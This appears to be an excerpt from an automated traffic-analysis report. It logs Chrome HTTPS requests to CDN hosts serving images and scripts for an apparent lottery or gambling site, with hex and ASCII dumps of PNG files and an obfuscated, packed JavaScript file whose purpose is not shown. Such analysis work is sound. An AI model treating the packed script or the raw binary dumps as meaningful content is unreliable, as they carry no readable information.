                                                                                                                                                          2024-06-09 22:41:25 UTC16384INData Raw: 77 63 6f 4a 69 46 53 2f 6a 55 70 62 42 66 37 61 45 61 41 45 2f 36 63 45 4c 2f 69 45 51 50 73 75 75 4f 45 51 42 41 48 2f 69 2b 44 73 6b 72 38 72 41 47 78 45 59 6b 46 65 70 50 59 7a 42 44 78 79 34 4f 38 6a 69 51 35 4b 77 79 79 4e 69 43 34 49 52 44 67 4e 49 37 6b 55 53 70 67 53 69 34 75 74 6d 65 52 61 32 61 71 73 4f 6f 61 34 71 6a 45 69 7a 51 41 6a 43 49 4a 43 30 45 37 4a 49 67 71 30 53 6c 34 4c 51 45 57 51 4c 68 6e 30 44 44 6d 42 75 49 54 6a 73 42 2b 70 4f 59 72 71 30 78 57 6b 72 69 38 34 4b 75 4d 65 67 44 6f 2f 46 6d 72 71 2f 38 6a 41 64 72 61 38 71 6c 41 56 72 6a 55 42 56 34 47 42 41 53 42 57 2f 4d 77 45 55 4d 59 67 48 53 52 54 2b 61 47 4f 55 61 44 77 2f 50 74 49 47 41 61 5a 57 68 6f 45 65 77 4e 69 70 4c 69 71 4d 6e 41 53 72 68 78 34 42 41 52 48 68 45 42
                                                                                                                                                          Data Ascii: wcoJiFS/jUpbBf7aEaAE/6cEL/iEQPsuuOEQBAH/i+Dskr8rAGxEYkFepPYzBDxy4O8jiQ5KwyyNiC4IRDgNI7kUSpgSi4utmeRa2aqsOoa4qjEizQAjCIJC0E7JIgq0Sl4LQEWQLhn0DDmBuITjsB+pOYrq0xWkri84KuMegDo/Fmrq/8jAdra8qlAVrjUBV4GBASBW/MwEUMYgHSRT+aGOUaDw/PtIGAaZWhoEewNipLiqMnASrhx4BARHhEB
                                                                                                                                                          2024-06-09 22:41:26 UTC16384INData Raw: 4d 44 54 53 6b 6b 56 53 64 74 61 71 63 46 59 6f 46 30 39 77 58 37 42 39 71 78 49 4c 59 44 53 41 59 4f 50 54 7a 30 77 6a 4d 4b 56 64 4d 6b 4b 74 35 36 4c 7a 67 54 35 78 47 68 70 4f 6f 47 57 78 46 6c 74 6a 30 6d 6c 44 47 71 52 62 48 65 44 77 59 36 74 6a 58 71 32 4f 72 48 46 30 6a 36 6e 46 56 78 58 32 4b 7a 2f 6b 4a 41 59 4e 58 31 74 36 62 66 72 69 52 6c 61 36 31 4a 33 79 48 44 74 32 45 34 6c 6c 39 6f 6a 70 33 39 6d 46 6e 66 4a 58 75 64 31 79 47 6c 74 42 64 39 56 66 4a 33 38 35 54 57 7a 68 58 71 4c 4b 58 64 47 74 75 56 2f 57 79 70 33 2b 78 31 56 63 42 33 44 64 77 51 56 51 63 34 64 63 61 63 56 58 79 74 77 33 65 44 33 58 64 2b 46 57 46 33 48 64 37 4d 71 6c 33 67 58 4d 50 64 46 33 6f 39 36 61 64 71 35 33 77 48 50 71 6f 41 6d 55 77 54 42 66 41 41 51 4e 45 68 4e
                                                                                                                                                          Data Ascii: MDTSkkVSdtaqcFYoF09wX7B9qxILYDSAYOPTz0wjMKVdMkKt56LzgT5xGhpOoGWxFltj0mlDGqRbHeDwY6tjXq2OrHF0j6nFVxX2Kz/kJAYNX1t6bfriRla61J3yHDt2E4ll9ojp39mFnfJXud1yGltBd9VfJ385TWzhXqLKXdGtuV/Wyp3+x1VcB3DdwQVQc4dcacVXytw3eD3Xd+FWF3Hd7Mql3gXMPdF3o96adq53wHPqoAmUwTBfAAQNEhN
                                                                                                                                                          2024-06-09 22:41:26 UTC8060INData Raw: 4a 4e 78 4b 4d 6e 53 71 45 56 49 58 4b 45 46 52 54 4b 6e 6c 59 67 6f 49 6c 6f 4f 4b 62 77 2f 2b 46 78 46 35 65 49 79 5a 6b 54 43 49 6c 6c 50 4b 59 5a 31 50 4a 61 6c 73 79 72 57 2b 61 38 73 5a 35 53 79 75 36 6c 4b 79 70 56 6c 43 67 49 32 56 43 73 4f 35 35 70 69 74 32 56 69 38 4a 4f 4a 2b 69 76 5a 35 35 78 4f 46 35 52 6d 4a 36 5a 72 35 58 5a 6c 6f 76 45 2f 6c 56 37 4a 76 6c 44 38 6f 6b 6c 6c 2b 50 64 35 6a 69 72 75 6c 2f 69 74 6e 30 46 50 78 39 79 73 76 4e 38 5a 45 2f 4d 42 41 74 50 42 6e 35 62 45 41 51 77 48 4a 77 41 5a 41 6f 70 6d 34 71 2f 49 66 41 68 2f 4a 37 68 43 47 43 45 51 35 77 74 4d 49 43 38 4b 75 46 36 2f 4c 4f 52 6f 53 44 68 35 4a 2f 50 6c 56 65 32 6c 45 70 4d 48 4f 45 41 77 49 41 45 2b 79 4b 71 53 4f 33 7a 48 76 70 7a 41 47 50 46 66 61 6c 53 56
                                                                                                                                                          Data Ascii: JNxKMnSqEVIXKEFRTKnlYgoIloOKbw/+FxF5eIyZkTCIllPKYZ1PJalsyrW+a8sZ5Syu6lKypVlCgI2VCsO55pit2Vi8JOJ+ivZ55xOF5RmJ6Zr5XZlovE/lV7JvlD8okll+Pd5jirul/itn0FPx9ysvN8ZE/MBAtPBn5bEAQwHJwAZAopm4q/IfAh/J7hCGCEQ5wtMIC8KuF6/LORoSDh5J/PlVe2lEpMHOEAwIAE+yKqSO3zHvpzAGPFfalSV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          721192.168.2.55050590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC376OUTGET /pc/image-pc/index/382/slot/10082.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 17624
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 09:05:19 GMT
                                                                                                                                                          ETag: "64c0e1cf-44d8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE8[3],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063146
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: cb13fd3a1681b2505f63835b79773a7e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528854
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 07 00 00 01 06 08 06 00 00 00 68 f7 50 02 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDRhPtEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4
                                                                                                                                                          2024-06-09 22:41:25 UTC1856INData Raw: 9b c3 e4 8c 3a 78 29 d9 71 ca a6 50 5c 3d 65 6d 28 a9 e0 88 40 96 09 ff fa 9e 5a bb 4a 2b 29 f0 6a 7d 49 e6 02 65 56 b6 e3 c2 a3 ba 21 94 4d a9 00 d2 19 88 7e c0 72 88 cc 35 16 82 6c a9 98 53 d8 98 19 63 af 62 32 b1 30 5c 8b b6 6e 09 0d aa ad e0 9c 26 40 6a 2f 0c d5 ff cc 92 9c b2 ee 4e 2d 14 f5 4a 94 0a 55 a4 ba e9 ea 2c b3 50 11 7c ca b3 76 5d 0e 04 b0 bb d4 fd 6c ed b2 73 66 49 7c 29 d9 8b aa 39 14 ff 46 91 d2 99 d5 a2 36 6a 71 c0 17 17 2d 67 74 61 99 d6 43 e5 ba ac 1d 60 04 1e 46 d6 9d da 37 54 b9 6f d6 18 a8 ae 58 44 c0 5e 4b 7c de 4d d5 67 d5 96 4a a1 99 0b c2 67 73 e2 44 5e d0 3a 55 58 d3 90 5b af 46 78 d4 b9 3c 10 ad 70 e8 d0 d5 6e c8 8a 99 1c 49 35 87 8a 1c 21 db 2a dd bb 62 01 a1 e4 1f 37 56 ed d6 88 28 b9 fa 4c 30 2b a9 cb 2a 3f a5 02 ba 2a e1
                                                                                                                                                          Data Ascii: :x)qP\=em(@ZJ+)j}IeV!M~r5lScb20\n&@j/N-JU,P|v]lsfI|)9F6jq-gtaC`F7ToXD^K|MgJgsD^:UX[Fx<pnI5!*b7V(L0+*?*


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          722192.168.2.55050354.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC552OUTGET /pc/240516-03/static/js/components/news.js HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          Etag: "6645cace-2228"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 8744
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 15333947926576931085
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC8744INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 45 34 42 64 41 47 67 47 38 41 68 45 41 46 77 42 6b 41 75 41 4d 77 46 63 30 59 61 42 4c 64 54 4a 55 6d 67 4a 54 6b 41 76 71 52 69 55 41 61 70 57 5a 73 4f 33 4e 4c 33 36 6b 30 51 67 45 51 73 6b 49 41 41 52 49 61 41 4a 30 34 64 56 41 62 67 44 79 59 41 46 59 67 4f 41 4f 67 41 6d 49 4a 70 7a 51 67 41 43 6e 70 51 51 51 65 6d 67 45 39 4d 4e 4b 53 71 41 50 72 42 49 45 67 41 73 69 68 32 4c 41 41 32 49 4b 6f 55 41 47 35 51 73 53 77 67 44 41 43 45 41 41 7a 43 41 73 59 70 65 6c 6f 67 41 4c 77 4b 71 67 43 32 53 51 41 53 41 49 71 71 41 71 53 63 5a 54 59 4b 49 49 30 6f 5a 5a 69 71 41 43 4a 32 2b 4d 41 4e 70 4d 41 74 43 69 69 4e 65 6c 32 71 32 5a
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgE4BdAGgG8AhEAFwBkAuAMwFc0YaBLdTJUmgJTkAvqRiUAapWZsO3NL36k0QgEQskIAARIaAJ04dVAbgDyYAFYgOAOgAmIJpzQgACnpQQQemgE9MNKSqAPrBIEgAsih2LAA2IKoUAG5QsSwgDACEAAzCAsYpelogALwKqgC2SQASAIqqAqScZTYKII0oZZiqACJ2+MANpMAtCiiNel2q2Z


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          723192.168.2.55050623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC380OUTGET /pc/image-pc/index/383/login/icon2.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1205
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:19 GMT
                                                                                                                                                          ETag: "64bf926b-4b5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE29[2],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464724
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 679631ff5ce27148aadc2d9bf11cc88d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127276
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC1205INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 0e 08 06 00 00 00 f9 61 e6 95 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          724192.168.2.55050723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC381OUTGET /pc/image-pc/index/383/footer/icon1.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2171
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:15 GMT
                                                                                                                                                          ETag: "64bf9267-87b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[6],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE15[1],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464724
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 164808bc57ad475f91c62e7f52063a31
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127276
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC2171INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 24 00 00 00 25 08 02 00 00 00 a5 3e dc 6a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR$%>jtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          725192.168.2.55050923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC381OUTGET /pc/image-pc/index/383/footer/icon2.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2164
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:15 GMT
                                                                                                                                                          ETag: "64bf9267-874"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[4],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE19[2],EU-FRA-paris-GLOBAL1-CACHE6[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464724
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2a3474946b56e1046a890521486a4a44
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127276
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC2164INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 24 00 00 00 25 08 02 00 00 00 a5 3e dc 6a 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR$%>jtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          726192.168.2.55050890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:25 UTC380OUTGET /pc/image-pc/index/312/nav/lottery/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:25 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:25 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 71418
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:49 GMT
                                                                                                                                                          ETag: "5d71fe81-116fa"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE6[3],EU-FRA-paris-GLOBAL1-CACHE15[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9dfa5a87a1d3ca187c0f027d8b32f3b1
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126903
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:25 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b0 00 00 00 b7 08 06 00 00 00 b2 b2 d4 e6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 67 b0 65 59 76 1e 06 7e 6b 9b e3 ae bf cf fb f4 be b2 b2 4c 96 ed ee ea ae 76 e8 06 1a 00 01 50 02 0d 38 20 47 20 29 88 94 14 12 63 a8 99 d1 90 60 30 14 12 19 e2 04 49 c5 48 a4 40 01 a2 40 10 24 48 a0 d1 00 1a 6d 50 5d d5 65 b3 ab b2 aa b2 d2 7b f3 fc bb ef 7a 77 ec 36 f3 e3 be 97 95 55 5d 6d 40 8c 28 05 39 3b e3 e4 7d f7 b8 7b ef 39 df 5e e7 db 6b 7d 6b 6d b2 d6 72 fc fb d8 ec 87 de d3 e8 c5
                                                                                                                                                          Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDCIDATxgeYv~kLvP8 G )c`0IH@@$HmP]e{zw6U]m@(9;}{9^k}kmr
